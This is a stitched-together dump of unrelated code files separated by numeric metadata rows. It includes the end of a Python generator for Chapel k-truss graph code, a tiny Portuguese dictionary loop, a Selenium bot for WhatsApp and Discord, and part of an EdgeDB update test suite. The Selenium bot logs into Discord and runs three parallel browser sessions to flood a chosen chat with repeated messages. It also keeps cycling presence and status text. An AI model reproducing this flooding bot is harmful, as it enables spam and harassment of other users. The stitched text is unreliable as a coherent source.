while ( (ConLoop) && (kLow<kUp)) {
// we will continuely check if the up value can remove the all edges
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
lAtoTriCount[i].write(AtoTriCount[i].read());
}
AllRemoved=SkMaxTrussMix(kUp,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, lAtoTriCount,lEdgeDeleted);
//writeln("Try up=",kUp);
if (AllRemoved==false) { //the up value is the max k
ConLoop=false;
} else {// we will check the mid value to reduce k max
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
lAtoTriCount[i].write(AtoTriCount[i].read());
}
//writeln("Try mid=",kMid);
AllRemoved=SkMaxTrussMix(kMid,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, lAtoTriCount,lEdgeDeleted);
if (AllRemoved==true) { // if mid value can remove all edges, we will reduce the up value for checking
kUp=kMid-1;
} else { // we will improve both low and mid value
if kMid==kUp-1 {
ConLoop=false;
kUp=kMid;
} else {// we will update the low value and then check the mid value
while ((AllRemoved==false) && (kMid<kUp-1)) {
kLow=kMid;
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
EdgeDeleted[i]=lEdgeDeleted[i];
AtoTriCount[i].write(lAtoTriCount[i].read());
}
//writeln("Try mid again=",kMid);
AllRemoved=SkMaxTrussMix(kMid,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, lAtoTriCount,lEdgeDeleted);
}
if (AllRemoved==false) {
kUp=kMid;
ConLoop=false;
} else {
kUp=kMid-1;
}
}
}
}
}// end of while
var countName = st.nextName();
var countEntry = new shared SymEntry(lEdgeDeleted);
st.addEntry(countName, countEntry);
repMsg = 'created ' + st.attrib(countName);
maxtimer.stop();
outMsg="After Max KTruss Mix ,Total execution time ="+(maxtimer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Max KTruss Mix ,Max k="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {//kUp<=3 or AllRemoved==true
maxtimer.stop();
outMsg="After Max KTruss Mix ,Total execution time ="+(maxtimer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if (AllRemoved==false) {
outMsg="After Max KTruss Mix ,Max k=3";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {
outMsg="After Max KTruss Mix ,Max k=2";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
}
}
}//
} else {// we have not tested directed graph extensively.
if (kValue>0) {// k branch
writeln("Enter kTruss k=",kValue);
repMsg=kTrussDirected(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a);
} else if (kValue==-2) {
//writeln("Enter Truss Directed Naive Decomposition");
//repMsg=TrussNaiveDecompositionDirected(3,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a);
//writeln("Enter Truss Directed Decomposition ");
//repMsg=TrussDecompositionDirected(3,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a);
} else {//k max branch
}//
return new MsgTuple(repMsg, MsgType.NORMAL);
}
proc registerMe() {
use CommandMap;
registerFunction("segmentedTruss", segTrussMsg);
}
}
'''
UnDirectedGraphTestBegin='''
if (!Directed) {//for undirected graph
'''
UnDirectedGraphTestEnd='''
} //end of undirected graph
'''
EndCode='''
return new MsgTuple(repMsg, MsgType.NORMAL);
}
proc registerMe() {
use CommandMap;
registerFunction("segmentedTruss", segTrussMsg);
}
}
'''
print(BeginCode)
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("//Begin of K-Truss Functions")
GenTrussFun("kTrussNaiveListIntersection",Parameters,NaiveListIntersection)
GenTrussFun("kTrussNaiveSetSearchSmall",Parameters,NaiveSetSearchSmall)
GenTrussFun("kTrussNaiveSetSearchSmallSeq",Parameters,NaiveSetSearchSmallSeq)
GenTrussFun("kTrussNaivePathMerge",Parameters,NaivePathMerge)
GenTrussFun("kTrussNaiveMinSearch",Parameters,NaiveMinSearch)
GenTrussFun("kTruss",ParametersAtomic,TrussAtomic)
GenTrussFun("kTrussMix",ParametersAtomic,TrussMixAtomic)
print("//End of K-Truss Functions")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("")
print("")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("//Begin of Max K-Truss Functions")
GenMaxTrussFunAtomic("OnceMaxTruss",MaxParametersAtomic,MaxTrussAtomic)
GenMaxTrussFunAtomic("OnceMaxTrussMix",MaxParametersAtomic,MaxTrussMixAtomic)
print("//End of Max K-Truss Functions")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("")
print("")
#print(middle)
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("//Begin of Truss Decomposition Functions")
GenDecompositionFun("TrussDecompositionNaiveListIntersection",Parameters,NaiveListIntersection)
GenDecompositionFun("TrussDecompositionNaiveSetSearchSmall",Parameters,NaiveSetSearchSmall)
GenDecompositionFun("TrussDecompositionNaivePathMerge",Parameters,NaivePathMerge)
GenDecompositionFun("TrussDecompositionNaiveMinSearch",Parameters,NaiveMinSearch)
GenDecompositionFun("TrussDecomposition",ParametersAtomic,TrussAtomic)
GenDecompositionFun("TrussMixDecomposition",ParametersAtomic,TrussMixAtomic)
print("//End of Truss Decomposition Functions")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("")
print("")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("//Begin of Undirected Graph ")
print(UnDirectedGraphTestBegin)
GenTrussTest()
GenMaxTrussTest()
GenDecompositionTest()
print(UnDirectedGraphTestEnd)
print("//End of Undirected Graph Test")
print("//@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("")
print("")
print(EndCode)
| 47.517374
| 138
| 0.309881
| 38,820
| 493,658
| 3.928594
| 0.015945
| 0.013803
| 0.016963
| 0.026097
| 0.931735
| 0.926719
| 0.923538
| 0.920686
| 0.918555
| 0.913277
| 0
| 0.023475
| 0.593919
| 493,658
| 10,388
| 139
| 47.521948
| 0.737296
| 0.001533
| 0
| 0.582763
| 0
| 0.02169
| 0.93231
| 0.113564
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008562
| false
| 0
| 0
| 0
| 0.019977
| 0.061644
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
29dccd2522bcc040ecaf22404e79a2768d926264
| 312
|
py
|
Python
|
16.loop3/13.percorrendo_valores_do_dic_com_for.py
|
robinson-1985/python-zero-dnc
|
df510d67e453611fcd320df1397cdb9ca47fecb8
|
[
"MIT"
] | null | null | null |
16.loop3/13.percorrendo_valores_do_dic_com_for.py
|
robinson-1985/python-zero-dnc
|
df510d67e453611fcd320df1397cdb9ca47fecb8
|
[
"MIT"
] | null | null | null |
16.loop3/13.percorrendo_valores_do_dic_com_for.py
|
robinson-1985/python-zero-dnc
|
df510d67e453611fcd320df1397cdb9ca47fecb8
|
[
"MIT"
] | null | null | null |
#percorrendo valores do dicionário com for
dicionario_full = {'usuario':'Peter','lingua':'pt-br','pet':['cachorro_1','cachorro_2']}
for a in dicionario_full.values():
print(a)
dicionario_full = {'usuario':'Peter','lingua':'pt-br','pet':['cachorro_1','cachorro_2']}
for a in dicionario_full.keys():
print(a)
| 34.666667
| 88
| 0.705128
| 46
| 312
| 4.608696
| 0.478261
| 0.264151
| 0.198113
| 0.245283
| 0.726415
| 0.726415
| 0.726415
| 0.726415
| 0.726415
| 0.726415
| 0
| 0.014035
| 0.086538
| 312
| 9
| 89
| 34.666667
| 0.729825
| 0.13141
| 0
| 0.666667
| 0
| 0
| 0.339483
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
29e1d312aea23cfb51dce4af5aa3a3f256f538a8
| 13,218
|
py
|
Python
|
main.py
|
TalionDev/webdriverbots
|
6ff6515c39791d16c91f308744b710632eb94e08
|
[
"MIT"
] | 2
|
2020-06-08T00:58:51.000Z
|
2020-06-08T02:04:46.000Z
|
main.py
|
TalionDev/webdriverbots
|
6ff6515c39791d16c91f308744b710632eb94e08
|
[
"MIT"
] | null | null | null |
main.py
|
TalionDev/webdriverbots
|
6ff6515c39791d16c91f308744b710632eb94e08
|
[
"MIT"
] | null | null | null |
#importando as parada
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import ElementNotInteractableException
import asyncio
print("os brabo")
print("bot supremo do zap pressione 1")
print("bot supremo discord pressione 2")
option = input("qual vai ser? ")
option = int(option)
if (option == 1):
print("bot supremo do zap")
print("para ficar mudando o seu recado pressione 1")
print("para ficar floodando qualquer mensagem pressione 2")
option = input("qual vai ser? ")
option = int(option)
if (option == 1):
print("tu escolheu mudar o recado")
time.sleep(1)
driver = webdriver.Chrome()
# abrindo o zap // nessa hora tu pega a camera de QR code do wpp web e abre o seu zap
driver.get("https://web.whatsapp.com/")
# cooldown brabo
time.sleep(4)
msg1 = input("recado q tu quer meter: ")
msg2 = input("recado q tu quer meter: ")
msg3 = input("recado q tu quer meter: ")
num = input("quantas vezes: ")
num = int(num) # transformando a variavel num em inteiro pq o python eh pau no cu e n faz automaticamente
a = []
# localizando o path no html e clicando nele
driver.find_element_by_class_name("_1BjNO").click()
time.sleep(1)
def cuzin():
a = driver.find_elements_by_xpath("//span[@data-icon='pencil']")
a[1].click()
driver.find_element_by_xpath("//div[@contenteditable='true']").send_keys(
Keys.BACKSPACE * 10 + msg1 + Keys.ENTER)
time.sleep(4)
a = driver.find_elements_by_xpath("//span[@data-icon='pencil']")
a[1].click()
driver.find_element_by_xpath("//div[@contenteditable='true']").send_keys(
Keys.BACKSPACE * 10 + msg2 + Keys.ENTER)
time.sleep(4)
a = driver.find_elements_by_xpath("//span[@data-icon='pencil']")
a[1].click()
driver.find_element_by_xpath("//div[@contenteditable='true']").send_keys(
Keys.BACKSPACE * 10 + msg3 + Keys.ENTER)
time.sleep(4)
i = 0
while (i <= num):
cuzin()
i = i + 1
elif (option == 2):
print("tu escolheu floodar qualquer coisa")
time.sleep(1)
# falando pro selenium que eu quero uma variavel setada como webdriver usando o driver do chrome
driver = webdriver.Chrome()
# abrindo o zap // nessa hora tu pega a camera de QR code do wpp web e abre o seu zap
driver.get("https://web.whatsapp.com/")
# cooldown brabo
time.sleep(4)
# variaveis neh rapazeada
i = 0 # variavel de controle padrao pro while, sim eu odeio for
name = input('nome do contato q tu quer spammar: ')
msg = input("msg q tu quer spammar: ")
num = input("quantas vezes: ")
num = int(num) # transformando a variavel num em inteiro pq o python eh pau no cu e n faz automaticamente
# localizando o path no html e clicando nele
driver.find_element_by_xpath("//span[@title='" + name + "']").click()
# criando uma funçao q localiza os path no html, enviando string e depois dando enter
def cuzin():
a = driver.find_elements_by_xpath("//div[@class='_3FRCZ copyable-text selectable-text']")
a[1].send_keys(" " + msg + Keys.ENTER)
# executando a funçao ate bater o num q foi setado
while (i <= num):
cuzin()
i = i + 1
elif (option == 2):
print("bot supremo do discord")
print("para ficar mudando o status rapidamente (baladinha) pressione 1")
print("para ficar mudando o seu recado pressione 2")
print("para ficar floodando qualquer mensagem pressione 3")
option = input("qual vai ser? ")
option = int(option)
if (option == 1):
print("tu escolheu baladinha")
time.sleep(1)
driver = webdriver.Chrome()
driver.get("https://discord.com/channels/@me")
email = input("email da conta: ")
senha = input("senha da conta: ")
num = input("quantas vezes: ")
num = int(num)
cd = input(
"cooldown entre as mudanças em segundos (números mto baixos podem não funcionar) // recomendado 1 segundo: ")
cd = int(cd)
# login
driver.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6)
def cuzin():
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(cd)
driver.find_element_by_xpath("//div[@id='status-picker-online']").click()
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(cd)
driver.find_element_by_xpath("//div[@id='status-picker-idle']").click()
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(cd)
driver.find_element_by_xpath("//div[@id='status-picker-dnd']").click()
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(cd)
driver.find_element_by_xpath("//div[@id='status-picker-invisible']").click()
i = 0
while (i <= num):
cuzin()
i = i + 1
elif (option == 2):
print("tu escolheu mudar os recados psicodelicamente")
driver = webdriver.Chrome()
driver.get("https://discord.com/channels/@me")
email = input("email da conta: ")
senha = input("senha da conta: ")
num = input("quantas vezes: ")
num = int(num)
msg1 = input("recado 1: ")
msg2 = input("recado 2: ")
msg3 = input("recado 3: ")
cd = input(
"cooldown entre as mudanças em segundos (números mto baixos podem não funcionar) // recomendado 2 segundos: ")
cd = int(cd)
# login
driver.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6)
def cuzin():
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(0.5)
driver.find_element_by_xpath("//div[@aria-label='Editar status personalizado']").click()
time.sleep(0.3)
driver.find_element_by_xpath("//input[@placeholder='O suporte chegou!']").send_keys(
Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + msg1 + Keys.ENTER)
time.sleep(cd)
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(0.5)
driver.find_element_by_xpath("//div[@aria-label='Editar status personalizado']").click()
time.sleep(0.3)
driver.find_element_by_xpath("//input[@placeholder='O suporte chegou!']").send_keys(
Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + msg2 + Keys.ENTER)
time.sleep(cd)
driver.find_element_by_xpath("//div[@class='avatar-SmRMf2 wrapper-3t9DeA']").click()
time.sleep(0.5)
driver.find_element_by_xpath("//div[@aria-label='Editar status personalizado']").click()
time.sleep(0.3)
driver.find_element_by_xpath("//input[@placeholder='O suporte chegou!']").send_keys(
Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + Keys.BACKSPACE + msg3 + Keys.ENTER)
time.sleep(cd)
i = 0
while (i <= num):
cuzin()
i = i + 1
elif (option == 3):
# falando pro selenium que eu quero uma variavel setada como webdriver usando o driver do chrome
driver = webdriver.Chrome()
driver2 = webdriver.Chrome()
driver3 = webdriver.Chrome()
# abrindo o zap // nessa hora tu pega a camera de QR code do wpp web e abre o seu zap
driver.get("https://discord.com/channels/@me")
driver2.get("https://discord.com/channels/@me")
driver3.get("https://discord.com/channels/@me")
email = input("email da conta: ")
senha = input("senha da conta: ")
name = input('nome de quem tu quer spammar (chat, server, dm, sla): ')
msg = input('a msg que tu quer spammar (pode ser link de img/gif): ')
num = input("quantas vezes: ")
num = int(num) # transformando a variavel num em inteiro pq o python eh pau no cu e n faz automaticamente
cd = input(
"cooldown entre as msg em segundos (números mto baixos podem não funcionar) // recomendado 1 segundo: ")
cd = int(cd)
# login
driver.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6)
driver2.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver2.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver2.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6)
driver3.find_element_by_xpath("//input[@name='email']").send_keys(email)
driver3.find_element_by_xpath("//input[@name='password']").send_keys(senha)
driver3.find_element_by_xpath("//button[@type='submit']").click()
time.sleep(6) # cooldown do login
# procurando o cara e dando enter
driver.find_element_by_xpath("//button[@class='searchBarComponent-32dTOx']").click()
driver.find_element_by_xpath("//input[@placeholder='Aonde você gostaria de ir?']").send_keys(name + Keys.ENTER)
# procurando o cara e dando enter
driver2.find_element_by_xpath("//button[@class='searchBarComponent-32dTOx']").click()
driver2.find_element_by_xpath("//input[@placeholder='Aonde você gostaria de ir?']").send_keys(name + Keys.ENTER)
driver3.find_element_by_xpath("//button[@class='searchBarComponent-32dTOx']").click()
driver3.find_element_by_xpath("//input[@placeholder='Aonde você gostaria de ir?']").send_keys(name + Keys.ENTER)
# criando uma funçao q localiza os path no html, enviando string e depois dando enter
async def cuzin():
try:
time.sleep(cd)
driver.find_element_by_xpath(
"//div[@class='markup-2BOw-j slateTextArea-1Mkdgw fontSize16Padding-3Wk7zP']").send_keys(
msg + Keys.ENTER + Keys.ENTER + Keys.ENTER)
driver2.find_element_by_xpath(
"//div[@class='markup-2BOw-j slateTextArea-1Mkdgw fontSize16Padding-3Wk7zP']").send_keys(
msg + Keys.ENTER + Keys.ENTER + Keys.ENTER)
driver3.find_element_by_xpath(
"//div[@class='markup-2BOw-j slateTextArea-1Mkdgw fontSize16Padding-3Wk7zP']").send_keys(
msg + Keys.ENTER + Keys.ENTER + Keys.ENTER)
time.sleep(cd)
except ElementNotInteractableException:
driver.find_element_by_xpath(
"//button[@class='primaryButton-3oJYZH button-38aScr lookFilled-1Gx00P colorBrand-3pXr91 sizeXlarge-2yFAlZ grow-q77ONN']").send_keys(
Keys.ENTER + Keys.ENTER + Keys.ENTER + Keys.ENTER)
driver2.find_element_by_xpath(
"//button[@class='primaryButton-3oJYZH button-38aScr lookFilled-1Gx00P colorBrand-3pXr91 sizeXlarge-2yFAlZ grow-q77ONN']").send_keys(
Keys.ENTER + Keys.ENTER + Keys.ENTER + Keys.ENTER)
driver3.find_element_by_xpath(
"//button[@class='primaryButton-3oJYZH button-38aScr lookFilled-1Gx00P colorBrand-3pXr91 sizeXlarge-2yFAlZ grow-q77ONN']").send_keys(
Keys.ENTER + Keys.ENTER + Keys.ENTER + Keys.ENTER)
time.sleep(2 * cd)
# executando a funçao ate bater o num q foi setado
async def sla():
i = 0
while (i <= num):
await cuzin()
i = i + 1
asyncio.run(sla())
| 44.959184
| 154
| 0.597745
| 1,624
| 13,218
| 4.748153
| 0.158251
| 0.047205
| 0.082609
| 0.112048
| 0.856309
| 0.831539
| 0.80664
| 0.786798
| 0.767086
| 0.743613
| 0
| 0.018809
| 0.275987
| 13,218
| 293
| 155
| 45.112628
| 0.786938
| 0
| 0
| 0.659091
| 0
| 0.013636
| 0.315273
| 0.126798
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.022727
| 0.040909
| null | null | 0.063636
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9cfa826a0cc6c82ca6e8b2014a00fcd658d82a4
| 72,248
|
py
|
Python
|
tests/test_edgeql_update.py
|
pnijhara/edgedb
|
04e47118ef4d2af5dca1a6bd937bb737873329c9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edgeql_update.py
|
pnijhara/edgedb
|
04e47118ef4d2af5dca1a6bd937bb737873329c9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_edgeql_update.py
|
pnijhara/edgedb
|
04e47118ef4d2af5dca1a6bd937bb737873329c9
|
[
"Apache-2.0"
] | null | null | null |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import os.path
import uuid
import edgedb
from edb.testbase import server as tb
class TestUpdate(tb.QueryTestCase):
SCHEMA = os.path.join(os.path.dirname(__file__), 'schemas',
'updates.esdl')
SETUP = os.path.join(os.path.dirname(__file__), 'schemas',
'updates.edgeql')
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.loop.run_until_complete(cls._setup_objects())
@classmethod
async def _setup_objects(cls):
cls.original = await cls.con.fetchall_json(r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
status: {
name
}
} ORDER BY .name;
""")
# this is used to validate what was updated and was untouched
cls.original = json.loads(cls.original)
async def test_edgeql_update_simple_01(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
# bad name doesn't exist, so no update is expected
FILTER .name = 'bad name'
SET {
status := (SELECT Status FILTER Status.name = 'Closed')
};
""",
[]
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
status: {
name
}
} ORDER BY .name;
""",
self.original,
)
async def test_edgeql_update_simple_02(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test1'
SET {
name := 'update-test1-updated',
status := (SELECT Status FILTER Status.name = 'Closed')
};
""",
[{}]
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
status: {
name
}
} ORDER BY .name;
""",
[
{
'id': orig1['id'],
'name': 'update-test1-updated',
'status': {
'name': 'Closed'
}
},
orig2,
orig3,
]
)
async def test_edgeql_update_simple_03(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test2'
SET {
comment := 'updated ' ++ UpdateTest.comment
};
""",
[{}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
} ORDER BY .name;
""",
[
{
'id': orig1['id'],
'name': orig1['name'],
'comment': orig1['comment'],
}, {
'id': orig2['id'],
'name': 'update-test2',
'comment': 'updated second',
}, {
'id': orig3['id'],
'name': orig3['name'],
'comment': orig3['comment'],
},
]
)
async def test_edgeql_update_simple_04(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
SET {
comment := UpdateTest.comment ++ "!",
status := (SELECT Status FILTER Status.name = 'Closed')
};
""",
[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name,
comment,
status: {
name
}
} ORDER BY .name;
""",
[
{
'id': orig1['id'],
'name': 'update-test1',
'comment': None,
'status': {
'name': 'Closed'
}
}, {
'id': orig2['id'],
'name': 'update-test2',
'comment': 'second!',
'status': {
'name': 'Closed'
}
}, {
'id': orig3['id'],
'name': 'update-test3',
'comment': 'third!',
'status': {
'name': 'Closed'
}
},
]
)
async def test_edgeql_update_returning_01(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
SELECT (
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test2'
SET {
comment := 'updated ' ++ UpdateTest.comment
}
) {
id,
name,
comment,
};
""",
[{
'id': orig2['id'],
'name': 'update-test2',
'comment': 'updated second',
}]
)
async def test_edgeql_update_returning_02(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH MODULE test
SELECT (
UPDATE UpdateTest
SET {
comment := UpdateTest.comment ++ "!",
status := (SELECT Status FILTER Status.name = 'Closed')
}
) {
id,
name,
comment,
status: {
name
}
};
""",
[
{
'id': orig1['id'],
'name': 'update-test1',
'comment': None,
'status': {
'name': 'Closed'
}
}, {
'id': orig2['id'],
'name': 'update-test2',
'comment': 'second!',
'status': {
'name': 'Closed'
}
}, {
'id': orig3['id'],
'name': 'update-test3',
'comment': 'third!',
'status': {
'name': 'Closed'
}
},
],
sort=lambda x: x['name']
)
async def test_edgeql_update_returning_03(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH
MODULE test,
U := (
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test2'
SET {
comment := 'updated ' ++ UpdateTest.comment
}
)
SELECT Status{name}
FILTER Status = U.status
ORDER BY Status.name;
""",
[{'name': 'Open'}],
)
async def test_edgeql_update_returning_04(self):
orig1, orig2, orig3 = self.original
await self.assert_query_result(
r"""
WITH
MODULE test,
Q := (
UPDATE UpdateTest
SET {
comment := UpdateTest.comment ++ "!",
status := (SELECT
Status FILTER Status.name = 'Closed')
}
)
SELECT
Q {
id,
name,
comment,
status: {
name
}
}
ORDER BY
Q.name;
""",
[{
'id': orig1['id'],
'name': 'update-test1',
'comment': None,
'status': {
'name': 'Closed'
}
}, {
'id': orig2['id'],
'name': 'update-test2',
'comment': 'second!',
'status': {
'name': 'Closed'
}
}, {
'id': orig3['id'],
'name': 'update-test3',
'comment': 'third!',
'status': {
'name': 'Closed'
}
}],
)
async def test_edgeql_update_returning_05(self):
# test that plain INSERT and UPDATE return objects they have
# manipulated
try:
data = []
data.append(await self.con.fetchone(r"""
INSERT test::UpdateTest {
name := 'ret5.1'
};
"""))
data.append(await self.con.fetchone(r"""
INSERT test::UpdateTest {
name := 'ret5.2'
};
"""))
data = [str(o.id) for o in data]
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name
}
FILTER .name LIKE '%ret5._'
ORDER BY .name;
""",
[
{
'id': data[0],
'name': 'ret5.1',
},
{
'id': data[1],
'name': 'ret5.2',
}
],
)
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name LIKE '%ret5._'
SET {
name := 'new ' ++ UpdateTest.name
};
""",
[{'id': data_id} for data_id in sorted(data)],
sort=lambda x: x['id']
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
id,
name
}
FILTER .name LIKE '%ret5._'
ORDER BY .name;
""",
[
{
'id': data[0],
'name': 'new ret5.1',
},
{
'id': data[1],
'name': 'new ret5.2',
}
],
)
objs = await self.con.fetchall(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name LIKE '%ret5._'
SET {
name := 'new ' ++ UpdateTest.name
};
"""
)
self.assertTrue(hasattr(objs[0], '__tid__'))
finally:
await self.con.execute(r"""
DELETE (
SELECT test::UpdateTest
FILTER .name LIKE '%ret5._'
);
""")
async def test_edgeql_update_generic_01(self):
status = await self.con.fetchone(r"""
WITH MODULE test
SELECT Status{id}
FILTER Status.name = 'Open'
LIMIT 1;
""")
status = str(status.id)
updated = await self.con.fetchall(
r"""
WITH MODULE test
UPDATE UpdateTest
FILTER UpdateTest.name = 'update-test3'
SET {
status := (
SELECT Status
FILTER Status.id = <uuid>$status
)
};
""",
status=status
)
self.assertGreater(len(updated), 0)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest {
name,
status: {
name
}
} FILTER UpdateTest.name = 'update-test3';
""",
[
{
'name': 'update-test3',
'status': {
'name': 'Open',
},
},
]
)
async def test_edgeql_update_filter_01(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE (SELECT UpdateTest)
# this FILTER is trivial because UpdateTest is wrapped
# into a SET OF by SELECT
FILTER UpdateTest.name = 'update-test1'
SET {
comment := 'bad test'
};
""",
[{}, {}, {}],
)
await self.assert_query_result(
r"""
WITH MODULE test
SELECT UpdateTest.comment;
""",
['bad test'] * 3,
)
async def test_edgeql_update_filter_02(self):
await self.assert_query_result(
r"""
WITH MODULE test
UPDATE (<UpdateTest>{} ?? UpdateTest)
# this FILTER is trivial because UpdateTest is wrapped
# into a SET OF by ??
FILTER UpdateTest.name = 'update-test1'
SET {
comment := 'bad test'
};
""",
